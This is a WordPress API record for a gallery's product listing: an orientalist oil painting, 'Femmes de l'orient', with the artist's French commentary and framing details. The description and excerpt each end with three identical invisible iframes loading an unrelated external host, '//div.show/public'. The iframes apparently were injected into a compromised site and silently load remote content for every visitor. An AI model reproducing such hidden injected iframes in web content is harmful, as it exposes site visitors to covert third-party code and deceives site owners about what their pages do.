{"id":5427,"date":"2024-09-07T16:24:04","date_gmt":"2024-09-07T14:24:04","guid":{"rendered":"https:\/\/meskinigallery.com\/?post_type=product&#038;p=5427"},"modified":"2025-02-08T12:48:14","modified_gmt":"2025-02-08T11:48:14","slug":"femmes-dalgerie","status":"publish","type":"product","link":"https:\/\/meskinigallery.com\/index.php\/product\/femmes-dalgerie\/","title":{"rendered":"Femmes de l&rsquo;orient"},"content":{"rendered":"<p>Titre\u00a0:\u00a0<b>Femmes de l&rsquo;orient<\/b><\/p>\n<p>Courant artistique\u00a0: \u00a0<b>L&rsquo;orientalisme<\/b><\/p>\n<p>Technique\u00a0: <b>Huile sur toile<\/b><\/p>\n<p>Ann\u00e9e\u00a0:<b> 2000<\/b><\/p>\n<p>Lecture de l\u2019artiste\u00a0:<\/p>\n<p><a name=\"_GoBack\"><\/a> <b>Il s\u2019agit d\u2019un groupe de femmes durant une pause entretenant une conversation silencieuse. Dans ce tableau appartenant \u00e0 la p\u00e9riode bleue, mon amour pour cette couleur dans ses nuances vari\u00e9es et ses reflets sur les formes plac\u00e9es, se caract\u00e9rise par le silence et la joie.\u00a0\u00bb<\/b><\/p>\n<p>Cadre\u00a0: <b>Bois massif, double cadre cuivre vernis<\/b><\/p>\n<p>Signature\u00a0:<b> En bas \u00e0 droite<\/b><\/p>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n","protected":false},"excerpt":{"rendered":"<p>Titre\u00a0:\u00a0<b>Femmes de l&rsquo;orient<\/b><\/p>\n<p>Courant artistique\u00a0: \u00a0<b>L&rsquo;orientalisme<\/b><\/p>\n<p>Technique\u00a0: <b>Huile sur toile<\/b><\/p>\n<p>Ann\u00e9e\u00a0:<b> 2000<\/b><\/p>\n<p>Lecture de l\u2019artiste\u00a0:<\/p>\n<p><a name=\"_GoBack\"><\/a> <b>Il s\u2019agit d\u2019un groupe de femmes durant une pause entretenant une conversation silencieuse. Dans ce tableau appartenant \u00e0 la p\u00e9riode bleue, mon amour pour cette couleur dans ses nuances vari\u00e9es et ses reflets sur les formes plac\u00e9es, se caract\u00e9rise par le silence et la joie.\u00a0\u00bb<\/b><\/p>\n<p>Cadre\u00a0: <b>Bois massif, double cadre cuivre vernis<\/b><\/p>\n<p>Signature\u00a0:<b> En bas \u00e0 droite<\/b><\/p>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n","protected":false},"featured_media":5081,"template":"","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0},"product_brand":[],"product_cat":[45],"product_tag":[],"giftcard-category":[],"class_list":{"0":"post-5427","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-orientalisme","9":"instock","10":"taxable","11":"shipping-taxable","12":"product-type-simple","13":"product-grid-view"},"aioseo_notices":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/product\/5427","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/types\/product"}],"version-history":[{"count":2,"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/product\/5427\/revisions"}],"predecessor-version":[{"id":5641,"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/product\/5427\/revisions\/5641"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/media\/5081"}],"wp:attachment":[{"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/media?parent=5427"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/product_brand?post=5427"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/product_cat?post=5427"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/product_tag?post=5427"},{"taxonomy":"giftcard-category","embeddable":true,"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/giftcard-category?post=5427"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}